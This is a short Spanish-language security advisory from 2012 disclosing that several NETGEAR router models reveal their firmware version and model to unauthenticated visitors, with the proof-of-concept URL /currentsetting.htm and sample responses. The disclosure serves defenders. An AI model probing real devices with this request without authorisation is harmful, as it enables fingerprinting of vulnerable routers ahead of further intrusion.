Revelación de información en NetgearRevelación de información en Netgear
Resumen
Varios dispositivos de marca NETGEAR poseen una vulnerabilidad de revelación de información en su interfaz de configuración web.
Descripción
| Modelos: | DGND3300v2, WNR2000v2, DGN1000, N300 |
| Firmwares: | V2.1.00.48_1.00.48, V1.1.0.41WW, V1.0.0.34_29.0.45NA |
| Fecha: | 26/05/2012 |
| Severidad: | Baja |
| Impacto: | Revelación de versión de firmware y modelo. |
| Vector de ataque: | Remoto sin autenticación |
| Solución: | Sin solución |
| Referencia: | CVE no disponible |
Varios dispositivos de marca NETGEAR poseen una vulnerabilidad de revelación de información. Es posible conocer la versión de firmware y el modelo del dispositivo al acceder sin autenticación a la url /currentsetting.htm
POC
Para explotar la vulnerabilidad solamente es necesario entrar a la URL:
http://<IP>/currentsetting.htm
Evidencia
Firmware=A2.1.00.48_1.00.48 RegionTag=DGND3300_WW Region=ww Model=DGND3300v2
Firmware=V1.1.0.41WW RegionTag=DGN1000_WW Region=WW Model=DGN1000
Firmware=V1.0.0.34_29.0.45NA RegionTag=WNR2000v2_NA Region=us Model=WNR2000v2
Pedro Joaquín
pjoaquin[]websec.mx
YOUTUBE
TWITTER
FACEBOOK
RSS
CONTÁCTANOS